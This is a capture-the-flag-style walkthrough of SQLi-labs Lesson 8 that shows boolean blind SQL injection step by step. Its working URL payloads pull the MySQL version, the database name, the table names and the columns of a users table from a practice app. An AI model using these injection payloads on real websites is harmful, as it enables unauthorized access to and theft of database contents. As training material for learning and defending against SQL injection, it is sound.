SQLi-labs: Lesson-8

Blind SQLi

  1. Get the database version

    • Get the first character.

      ?id=1' and (select substr(version(),1,1))<6--+

      Result: You are in...........

      ?id=1' and (select substr(version(),1,1))<5--+

      No result.

      ?id=1' and (select substr(version(),1,1))=5--+

      Result: You are in...........

      So the first character of the database version is 5.

    • Get the second character.

      Since the database xx.xx.xx.xx, the ascii of '.' is 46.

      ?id=1' and ascii(substr(version(),2,1))<ascii(1)--+ returns true. ?id=1' AND (ascii(substr(version(),2,1))=46)--+ or ?id=1' AND (ascii(substr(version(),2,1))=ascii('.'))--+ returns true.

      So the second character is '.'.

    Similary, we can get other characters of the database version.

    5.6.30-1

  2. Get the database name

    • ?id=1' AND (ascii(substr(database(),1,1))>ascii('a'))--+ returns true.
    • ?id=1' AND (ascii(substr(database(),1,1))>ascii('x'))--+ returns false.
    • ?id=1' AND (ascii(substr(database(),1,1))<ascii('m'))--+ returns false.
    • ?id=1' AND (ascii(substr(database(),1,1))=ascii('s'))--+ returs true. So the first character is 's'.
    • Similarly, we can get the dababase name is 'security'.

  3. Get the table name

    • ?id=1' AND (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))=ascii('e'))--+
    • or, ?id=1' AND (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=ascii('e'))--+

    • or, ?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=ascii('e'))--+

      Comment:

      Result of group_concat(table_name): emails,referers,uagents,users

      Result of select table_name....limit 0,1: emails

  4. Get columns

    • ?id=1' AND (ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1))=ascii('i'))--+ returns true.
    • or, ?id=1' AND (ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1))=ascii('i'))--+ returns true

Comment:

Result of group_concat(column_name): id,username,password

Result of select column_name....limit 0,1: id

Enjoy : )

results matching ""

    No results matching ""